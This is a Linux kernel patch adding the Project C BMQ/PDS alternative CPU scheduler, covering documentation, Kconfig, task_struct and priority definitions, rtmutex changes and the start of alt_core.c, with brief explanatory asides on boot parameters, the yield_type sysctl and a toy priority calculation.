+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 42af9ca0127e..31747ec54f9d 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5406,6 +5406,12 @@
+ 	sa1100ir	[NET]
+ 			See drivers/net/irda/sa1100_ir.c.
+
++	sched_timeslice=
++			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
++			Format: integer 2, 4
++			Default: 4
++			See Documentation/scheduler/sched-BMQ.txt
++
+ 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
+
+ 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
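As the Format line says, only 2 and 4 are accepted; the parser in alt_core.c further down falls back to 4 ms for any other value, so selecting the shorter slice is a single kernel command-line addition, e.g.:

	sched_timeslice=2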
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 98d1b198b2b4..d7c78a107f93 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1552,3 +1552,13 @@ is 10 seconds.
+
+ The softlockup threshold is (``2 * watchdog_thresh``). Setting this
+ tunable to zero will disable lockup detection altogether.
++
++yield_type:
++===========
++
++BMQ/PDS CPU scheduler only. This determines what type of yield a call
++to sched_yield() will perform.
++
++  0 - No yield.
++  1 - Deboost and requeue task. (default)
++  2 - Set run queue skip task.
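At runtime this is an ordinary sysctl; for example, to disable yields entirely (path assumed from the standard sysctl layout):

	# echo 0 > /proc/sys/kernel/yield_type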
+diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
+new file mode 100644
+index 000000000000..05c84eec0f31
+--- /dev/null
++++ b/Documentation/scheduler/sched-BMQ.txt
+@@ -0,0 +1,110 @@
++                         BitMap queue CPU Scheduler
++                         --------------------------
++
++CONTENT
++========
++
++ Background
++ Design
++   Overview
++   Task policy
++   Priority management
++   BitMap Queue
++   CPU Assignment and Migration
++
++
++Background
++==========
++
++BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
++of the previous Priority and Deadline based Skiplist multiple queue scheduler
++(PDS), and was inspired by the Zircon scheduler. Its goal is to keep the
++scheduler code simple while staying efficient and scalable for interactive
++workloads such as desktop use, movie playback and gaming.
++
++Design
++======
++
++Overview
++--------
++
++BMQ uses a per-CPU run queue design: each (logical) CPU has its own run
++queue, and each CPU is responsible for scheduling the tasks that are put
++into its run queue.
++
++The run queue is a set of priority queues. Note that these queues are FIFO
++queues for non-rt tasks and priority queues for rt tasks; see BitMap Queue
++below for details. BMQ is optimized for non-rt tasks because most
++applications are non-rt tasks. Whether the queue is FIFO or priority, each
++queue is an ordered list of runnable tasks awaiting execution, and the data
++structures are the same. When it is time for a new task to run, the
++scheduler simply looks for the lowest numbered queue that contains a task
++and runs the first task from the head of that queue. The per-CPU idle task
++is also in the run queue, so the scheduler can always find a task to run
++from its run queue.
++
++Each task is assigned the same timeslice (default 4 ms) when it is picked to
++start running. A task is reinserted at the end of the appropriate priority
++queue when it uses up its whole timeslice. When the scheduler selects a new
++task from the priority queue it sets the CPU's preemption timer for the
++remainder of the previous timeslice. When that timer fires, the scheduler
++stops executing that task, selects another task and starts over again.
++
++If a task blocks waiting for a shared resource then it's taken out of its
++priority queue and is placed in a wait queue for the shared resource. When it
++is unblocked it will be reinserted in the appropriate priority queue of an
++eligible CPU.
++
++Task policy
++-----------
++
++BMQ supports the DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policies,
++like the mainline CFS scheduler, but it is heavily optimized for non-rt
++tasks, that is, NORMAL/BATCH/IDLE policy tasks. Below are the implementation
++details for each policy.
++
++DEADLINE
++	It is squashed as priority 0 FIFO task.
++
++FIFO/RR
++	All RT tasks share one single priority queue in the BMQ run queue design.
++The complexity of the insert operation is O(n). BMQ is not designed for
++systems that run mostly rt policy tasks.
++
++NORMAL/BATCH/IDLE
++	BATCH and IDLE tasks are treated as the same policy. They compete for CPU
++with NORMAL policy tasks, but they just don't boost. To control the priority
++of NORMAL/BATCH/IDLE tasks, simply use the nice level.
++
++ISO
++	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
++task instead.
++
++Priority management
++-------------------
++
++RT tasks have priorities from 0-99. For non-rt tasks, there are three
++different factors used to determine the effective priority of a task, the
++effective priority being what determines which queue it will be in.
++
++The first factor is simply the task's static priority, which is assigned
++from the task's nice level: [-20, 19] from userland's point of view and
++[0, 39] internally.
++
++The second factor is the priority boost. This is a value bounded between
++[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority; it
++is modified in the following cases:
++
++* When a thread has used up its entire timeslice, always deboost it by
++increasing its boost value by one.
++* When a thread gives up CPU control (voluntarily or not) to reschedule, and
++its switch-in time (the time between its last switch-in and run) is below
++the threshold based on its priority boost, boost it by decreasing its boost
++value by one, capped at 0 (it won't go negative).
++
++The intent in this system is to ensure that interactive threads are serviced
++quickly. These are usually the threads that interact directly with the user
++and cause user-perceivable latency. These threads usually do little work and
++spend most of their time blocked awaiting another user event. So they get the
++priority boost from unblocking while background threads that do most of the
++processing receive the priority penalty for using their entire timeslice.
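Combining the two factors described above, a toy C sketch of how a non-rt task's queue index could be derived (the exact combination shown is an illustration of this text, not code lifted from the patch):

#include <stdio.h>

#define MAX_PRIORITY_ADJ 7	/* BMQ's bound from the text above */

static int clamp_int(int v, int lo, int hi)
{
	return v < lo ? lo : (v > hi ? hi : v);
}

/* nice [-20, 19] -> static priority [0, 39]; the boost offsets it,
 * and lower resulting values are served first */
static int effective_prio(int nice, int boost_prio)
{
	int static_prio = nice + 20;

	boost_prio = clamp_int(boost_prio, -MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ);
	return static_prio + boost_prio;
}

int main(void)
{
	/* a nice-0 task that kept sleeping vs. one that burned its slices */
	printf("%d vs %d\n", effective_prio(0, -3), effective_prio(0, 3));
	return 0;
}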
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b..2a8530021b23 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
+ 		seq_puts(m, "0 0 0\n");
+ 	else
+ 		seq_printf(m, "%llu %llu %lu\n",
+-		   (unsigned long long)task->se.sum_exec_runtime,
++		   (unsigned long long)tsk_seruntime(task),
+ 		   (unsigned long long)task->sched_info.run_delay,
+ 		   task->sched_info.pcount);
+
+diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
+index 8874f681b056..59eb72bf7d5f 100644
+--- a/include/asm-generic/resource.h
++++ b/include/asm-generic/resource.h
+@@ -23,7 +23,7 @@
+ 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
+ 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
+-	[RLIMIT_NICE]		= { 0, 0 },				\
++	[RLIMIT_NICE]		= { 30, 30 },				\
+ 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
+ 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ }
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index ffb6eb55cd13..2e730a59caa2 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -762,8 +762,14 @@ struct task_struct {
+ 	unsigned int			ptrace;
+
+ #ifdef CONFIG_SMP
+-	int				on_cpu;
+ 	struct __call_single_node	wake_entry;
++#endif
++#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
++	int				on_cpu;
++#endif
++
++#ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 	unsigned int			wakee_flips;
+ 	unsigned long			wakee_flip_decay_ts;
+ 	struct task_struct		*last_wakee;
+@@ -777,6 +783,7 @@ struct task_struct {
+ 	 */
+ 	int				recent_used_cpu;
+ 	int				wake_cpu;
++#endif /* !CONFIG_SCHED_ALT */
+ #endif
+ 	int				on_rq;
+
+@@ -785,6 +792,20 @@ struct task_struct {
+ 	int				normal_prio;
+ 	unsigned int			rt_priority;
+
++#ifdef CONFIG_SCHED_ALT
++	u64				last_ran;
++	s64				time_slice;
++	int				sq_idx;
++	struct list_head		sq_node;
++#ifdef CONFIG_SCHED_BMQ
++	int				boost_prio;
++#endif /* CONFIG_SCHED_BMQ */
++#ifdef CONFIG_SCHED_PDS
++	u64				deadline;
++#endif /* CONFIG_SCHED_PDS */
++	/* sched_clock time spent running */
++	u64				sched_time;
++#else /* !CONFIG_SCHED_ALT */
+ 	struct sched_entity		se;
+ 	struct sched_rt_entity		rt;
+ 	struct sched_dl_entity		dl;
+@@ -795,6 +816,7 @@ struct task_struct {
+ 	unsigned long			core_cookie;
+ 	unsigned int			core_occupation;
+ #endif
++#endif /* !CONFIG_SCHED_ALT */
+
+ #ifdef CONFIG_CGROUP_SCHED
+ 	struct task_group		*sched_task_group;
+@@ -1545,6 +1567,15 @@ struct task_struct {
+ 	 */
+ };
+
++#ifdef CONFIG_SCHED_ALT
++#define tsk_seruntime(t)		((t)->sched_time)
++/* replace the uncertain rt_timeout with 0UL */
++#define tsk_rttimeout(t)		(0UL)
++#else /* CFS */
++#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
++#define tsk_rttimeout(t)	((t)->rt.timeout)
++#endif /* !CONFIG_SCHED_ALT */
++
+ static inline struct pid *task_pid(struct task_struct *task)
+ {
+ 	return task->thread_pid;
+diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
+index 7c83d4d5a971..fa30f98cb2be 100644
+--- a/include/linux/sched/deadline.h
++++ b/include/linux/sched/deadline.h
+@@ -1,5 +1,24 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+
++#ifdef CONFIG_SCHED_ALT
++
++static inline int dl_task(struct task_struct *p)
++{
++	return 0;
++}
++
++#ifdef CONFIG_SCHED_BMQ
++#define __tsk_deadline(p)	(0UL)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
++#endif
++
++#else
++
++#define __tsk_deadline(p)	((p)->dl.deadline)
++
+ /*
+  * SCHED_DEADLINE tasks has negative priorities, reflecting
+  * the fact that any of them has higher prio than RT and
+@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
+ {
+ 	return dl_prio(p->prio);
+ }
++#endif /* CONFIG_SCHED_ALT */
+
+ static inline bool dl_time_before(u64 a, u64 b)
+ {
+diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
+index ab83d85e1183..6af9ae681116 100644
+--- a/include/linux/sched/prio.h
++++ b/include/linux/sched/prio.h
+@@ -18,6 +18,32 @@
+ #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
+ #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
+
++#ifdef CONFIG_SCHED_ALT
++
++/* Undefine MAX_PRIO and DEFAULT_PRIO */
++#undef MAX_PRIO
++#undef DEFAULT_PRIO
++
++/* +/- priority levels from the base priority */
++#ifdef CONFIG_SCHED_BMQ
++#define MAX_PRIORITY_ADJ	(7)
++
++#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
++#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define MAX_PRIORITY_ADJ	(0)
++
++#define MIN_NORMAL_PRIO		(128)
++#define NORMAL_PRIO_NUM		(64)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
++#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
++#endif
++
++#endif /* CONFIG_SCHED_ALT */
++
+ /*
+  * Convert user-nice values [ -20 ... 0 ... 19 ]
+  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
+diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
+index 994c25640e15..8c050a59ece1 100644
+--- a/include/linux/sched/rt.h
++++ b/include/linux/sched/rt.h
+@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
+
+ 	if (policy == SCHED_FIFO || policy == SCHED_RR)
+ 		return true;
++#ifndef CONFIG_SCHED_ALT
+ 	if (policy == SCHED_DEADLINE)
+ 		return true;
++#endif
+ 	return false;
+ }
+
+diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
+index 816df6cc444e..c8da08e18c91 100644
+--- a/include/linux/sched/topology.h
++++ b/include/linux/sched/topology.h
+@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
+
+ #endif	/* !CONFIG_SMP */
+
+-#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
++#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
++	!defined(CONFIG_SCHED_ALT)
+ extern void rebuild_sched_domains_energy(void);
+ #else
+ static inline void rebuild_sched_domains_energy(void)
+diff --git a/init/Kconfig b/init/Kconfig
+index 94125d3b6893..c87ba766d354 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -819,6 +819,7 @@ menu "Scheduler features"
+ config UCLAMP_TASK
+ 	bool "Enable utilization clamping for RT/FAIR tasks"
+ 	depends on CPU_FREQ_GOV_SCHEDUTIL
++	depends on !SCHED_ALT
+ 	help
+ 	  This feature enables the scheduler to track the clamped utilization
+ 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
+@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
+
+ 	  If in doubt, use the default value.
+
++menuconfig SCHED_ALT
++	bool "Alternative CPU Schedulers"
++	default y
++	help
++	  This feature enables the alternative CPU schedulers.
++
++if SCHED_ALT
++
++choice
++	prompt "Alternative CPU Scheduler"
++	default SCHED_BMQ
++
++config SCHED_BMQ
++	bool "BMQ CPU scheduler"
++	help
++	  The BitMap Queue CPU scheduler for excellent interactivity and
++	  responsiveness on the desktop and solid scalability on normal
++	  hardware and commodity servers.
++
++config SCHED_PDS
++	bool "PDS CPU scheduler"
++	help
++	  The Priority and Deadline based Skip list multiple queue CPU
++	  Scheduler.
++
++endchoice
++
++endif
++
+ endmenu
+
+ #
+@@ -918,6 +948,7 @@ config NUMA_BALANCING
+ 	depends on ARCH_SUPPORTS_NUMA_BALANCING
+ 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
+ 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
++	depends on !SCHED_ALT
+ 	help
+ 	  This option adds support for automatic NUMA aware memory/task placement.
+ 	  The mechanism is quite primitive and is based on migrating memory when
+@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
+ 	depends on CGROUP_SCHED
+ 	default CGROUP_SCHED
+
++if !SCHED_ALT
+ config CFS_BANDWIDTH
+ 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
+ 	depends on FAIR_GROUP_SCHED
+@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
+ 	  realtime bandwidth for them.
+ 	  See Documentation/scheduler/sched-rt-group.rst for more information.
+
++endif #!SCHED_ALT
+ endif #CGROUP_SCHED
+
+ config UCLAMP_TASK_GROUP
+@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
+
+ config SCHED_AUTOGROUP
+ 	bool "Automatic process group scheduling"
++	depends on !SCHED_ALT
+ 	select CGROUPS
+ 	select CGROUP_SCHED
+ 	select FAIR_GROUP_SCHED
+diff --git a/init/init_task.c b/init/init_task.c
+index ff6c4b9bfe6b..19e9c662d1a1 100644
+--- a/init/init_task.c
++++ b/init/init_task.c
+@@ -75,9 +75,15 @@ struct task_struct init_task
+ 	.stack		= init_stack,
+ 	.usage		= REFCOUNT_INIT(2),
+ 	.flags		= PF_KTHREAD,
++#ifdef CONFIG_SCHED_ALT
++	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++	.static_prio	= DEFAULT_PRIO,
++	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++#else
+ 	.prio		= MAX_PRIO - 20,
+ 	.static_prio	= MAX_PRIO - 20,
+ 	.normal_prio	= MAX_PRIO - 20,
++#endif
+ 	.policy		= SCHED_NORMAL,
+ 	.cpus_ptr	= &init_task.cpus_mask,
+ 	.user_cpus_ptr	= NULL,
+@@ -88,6 +94,17 @@ struct task_struct init_task
+ 	.restart_block	= {
+ 		.fn = do_no_restart_syscall,
+ 	},
++#ifdef CONFIG_SCHED_ALT
++	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
++#ifdef CONFIG_SCHED_BMQ
++	.boost_prio	= 0,
++	.sq_idx		= 15,
++#endif
++#ifdef CONFIG_SCHED_PDS
++	.deadline	= 0,
++#endif
++	.time_slice	= HZ,
++#else
+ 	.se		= {
+ 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
+ 	},
+@@ -95,6 +112,7 @@ struct task_struct init_task
+ 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
+ 		.time_slice	= RR_TIMESLICE,
+ 	},
++#endif
+ 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
+ #ifdef CONFIG_SMP
+ 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
+diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
+index c2f1fd95a821..41654679b1b2 100644
+--- a/kernel/Kconfig.preempt
++++ b/kernel/Kconfig.preempt
+@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
+
+ config SCHED_CORE
+ 	bool "Core Scheduling for SMT"
+-	depends on SCHED_SMT
++	depends on SCHED_SMT && !SCHED_ALT
+ 	help
+ 	  This option permits Core Scheduling, a means of coordinated task
+ 	  selection across SMT siblings. When enabled -- see
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index b474289c15b8..a23224b45b03 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
+ 	return ret;
+ }
+
+-#ifdef CONFIG_SMP
++#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * Helper routine for generate_sched_domains().
+  * Do cpusets a, b have overlapping effective cpus_allowed masks?
+@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
+ 	/* Have scheduler rebuild the domains */
+ 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
+ }
+-#else /* !CONFIG_SMP */
++#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
+ static void rebuild_sched_domains_locked(void)
+ {
+ }
+diff --git a/kernel/delayacct.c b/kernel/delayacct.c
+index e39cb696cfbd..463423572e09 100644
+--- a/kernel/delayacct.c
++++ b/kernel/delayacct.c
+@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
+ 	 */
+ 	t1 = tsk->sched_info.pcount;
+ 	t2 = tsk->sched_info.run_delay;
+-	t3 = tsk->se.sum_exec_runtime;
++	t3 = tsk_seruntime(tsk);
+
+ 	d->cpu_count += t1;
+
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 35e0a31a0315..64e368441cf4 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 			sig->curr_target = next_thread(tsk);
+ 	}
+
+-	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
++	add_device_randomness((const void*) &tsk_seruntime(tsk),
+ 			      sizeof(unsigned long long));
+
+ 	/*
+@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 	sig->inblock += task_io_get_inblock(tsk);
+ 	sig->oublock += task_io_get_oublock(tsk);
+ 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
+-	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
++	sig->sum_sched_runtime += tsk_seruntime(tsk);
+ 	sig->nr_threads--;
+ 	__unhash_process(tsk, group_dead);
+ 	write_sequnlock(&sig->stats_lock);
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 7779ee8abc2a..5b9893cdfb1b 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -343,7 +343,7 @@ waiter_update_prio(struct rt_mutex_waite
+ 	lockdep_assert(RB_EMPTY_NODE(&waiter->tree.entry));
+ 
+ 	waiter->tree.prio = __waiter_prio(task);
+-	waiter->tree.deadline = task->dl.deadline;
++	waiter->tree.deadline = __tsk_deadline(task);
+ }
+ 
+ /*
+@@ -364,16 +364,20 @@ waiter_clone_prio(struct rt_mutex_waiter
+  * Only use with rt_waiter_node_{less,equal}()
+  */
+ #define task_to_waiter_node(p)	\
+-	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
+ #define task_to_waiter(p)	\
+ 	&(struct rt_mutex_waiter){ .tree = *task_to_waiter_node(p) }
+ 
+ static __always_inline int rt_waiter_node_less(struct rt_waiter_node *left,
+ 					       struct rt_waiter_node *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline < right->deadline);
++#else
+ 	if (left->prio < right->prio)
+ 		return 1;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -382,16 +386,22 @@ static __always_inline int rt_waiter_nod
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return dl_time_before(left->deadline, right->deadline);
++#endif
+ 
+ 	return 0;
++#endif
+ }
+ 
+ static __always_inline int rt_waiter_node_equal(struct rt_waiter_node *left,
+ 						 struct rt_waiter_node *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline == right->deadline);
++#else
+ 	if (left->prio != right->prio)
+ 		return 0;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -400,8 +410,10 @@ static __always_inline int rt_waiter_nod
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return left->deadline == right->deadline;
++#endif
+ 
+ 	return 1;
++#endif
+ }
+ 
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
+index 976092b7bd45..31d587c16ec1 100644
+--- a/kernel/sched/Makefile
++++ b/kernel/sched/Makefile
+@@ -28,7 +28,12 @@ endif
+ # These compilation units have roughly the same size and complexity - so their
+ # build parallelizes well and finishes roughly at once:
+ #
++ifdef CONFIG_SCHED_ALT
++obj-y += alt_core.o
++obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
++else
+ obj-y += core.o
+ obj-y += fair.o
++endif
+ obj-y += build_policy.o
+ obj-y += build_utility.o
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+new file mode 100644
+index 000000000000..572eab74418f
+--- /dev/null
++++ b/kernel/sched/alt_core.c
+@@ -0,0 +1,7961 @@
++/*
++ *  kernel/sched/alt_core.c
++ *
++ *  Core alternative kernel scheduler code and related syscalls
++ *
++ *  Copyright (C) 1991-2002  Linus Torvalds
++ *
++ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
++ *		a whole lot of those previous things.
++ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
++ *		scheduler by Alfred Chen.
++ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
++ */
++#include <linux/sched/cputime.h>
++#include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
++#include <linux/sched/loadavg.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/nohz.h>
++#include <linux/sched/stat.h>
++#include <linux/sched/wake_q.h>
++
++#include <linux/blkdev.h>
++#include <linux/context_tracking.h>
++#include <linux/cpuset.h>
++#include <linux/delayacct.h>
++#include <linux/init_task.h>
++#include <linux/kcov.h>
++#include <linux/kprobes.h>
++#include <linux/profile.h>
++#include <linux/nmi.h>
++#include <linux/scs.h>
++
++#include <uapi/linux/sched/types.h>
++
++#include <asm/irq_regs.h>
++#include <asm/switch_to.h>
++
++#define CREATE_TRACE_POINTS
++#include <trace/events/sched.h>
++#undef CREATE_TRACE_POINTS
++
++#include "sched.h"
++
++#include "pelt.h"
++
++#include "../../io_uring/io-wq.h"
++#include "../smpboot.h"
++
++/*
++ * Export tracepoints that act as a bare tracehook (ie: have no trace event
++ * associated with them) to allow external modules to probe them.
++ */
++EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
++
++#ifdef CONFIG_SCHED_DEBUG
++#define sched_feat(x)	(1)
++/*
++ * Print a warning if need_resched is set for the given duration (if
++ * LATENCY_WARN is enabled).
++ *
++ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
++ * per boot.
++ */
++__read_mostly int sysctl_resched_latency_warn_ms = 100;
++__read_mostly int sysctl_resched_latency_warn_once = 1;
++#else
++#define sched_feat(x)	(0)
++#endif /* CONFIG_SCHED_DEBUG */
++
++#define ALT_SCHED_VERSION "v6.1-r1"
++
++/* rt_prio(prio) defined in include/linux/sched/rt.h */
++#define rt_task(p)		rt_prio((p)->prio)
++#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
++#define task_has_rt_policy(p)	(rt_policy((p)->policy))
++
++#define STOP_PRIO		(MAX_RT_PRIO - 1)
++
++/* Default time slice is 4 ms; it can be set via the kernel parameter "sched_timeslice" */
++u64 sched_timeslice_ns __read_mostly = (4 << 20);
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
++
++#ifdef CONFIG_SCHED_BMQ
++#include "bmq.h"
++#endif
++#ifdef CONFIG_SCHED_PDS
++#include "pds.h"
++#endif
++
++static int __init sched_timeslice(char *str)
++{
++	int timeslice_ms;
++
++	get_option(&str, &timeslice_ms);
++	if (2 != timeslice_ms)
++		timeslice_ms = 4;
++	sched_timeslice_ns = timeslice_ms << 20;
++	sched_timeslice_imp(timeslice_ms);
++
++	return 0;
++}
++early_param("sched_timeslice", sched_timeslice);
++
++/* Reschedule if less than this many μs left */
++#define RESCHED_NS		(100 << 10)
++
++/**
++ * sched_yield_type - Choose what sort of yield sched_yield will perform.
++ * 0: No yield.
++ * 1: Deboost and requeue task. (default)
++ * 2: Set rq skip task.
++ */
++int sched_yield_type __read_mostly = 1;
++
++#ifdef CONFIG_SMP
++static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
++
++DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
++
++#ifdef CONFIG_SCHED_SMT
++DEFINE_STATIC_KEY_FALSE(sched_smt_present);
++EXPORT_SYMBOL_GPL(sched_smt_present);
++#endif
++
++/*
++ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
++ * the domain), this allows us to quickly tell if two cpus are in the same cache
++ * domain, see cpus_share_cache().
++ */
++DEFINE_PER_CPU(int, sd_llc_id);
++#endif /* CONFIG_SMP */
++
++static DEFINE_MUTEX(sched_hotcpu_mutex);
++
++DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
++#endif
++static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
++
++/* sched_queue related functions */
++static inline void sched_queue_init(struct sched_queue *q)
++{
++	int i;
++
++	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
++	for(i = 0; i < SCHED_BITS; i++)
++		INIT_LIST_HEAD(&q->heads[i]);
++}
++
++/*
++ * Init idle task and put into queue structure of rq
++ * IMPORTANT: may be called multiple times for a single cpu
++ */
++static inline void sched_queue_init_idle(struct sched_queue *q,
++					 struct task_struct *idle)
++{
++	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
++	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
++	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
++}
++
++static inline void
++clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - 1 - pr);
++}
++
++static inline void
++set_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - 1 - pr);
++}
++
++static atomic_t sched_prio_record = ATOMIC_INIT(0);
++
++/* water mark related functions */
++static inline void update_sched_preempt_mask(struct rq *rq)
++{
++	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_prio = rq->prio;
++	int cpu, pr;
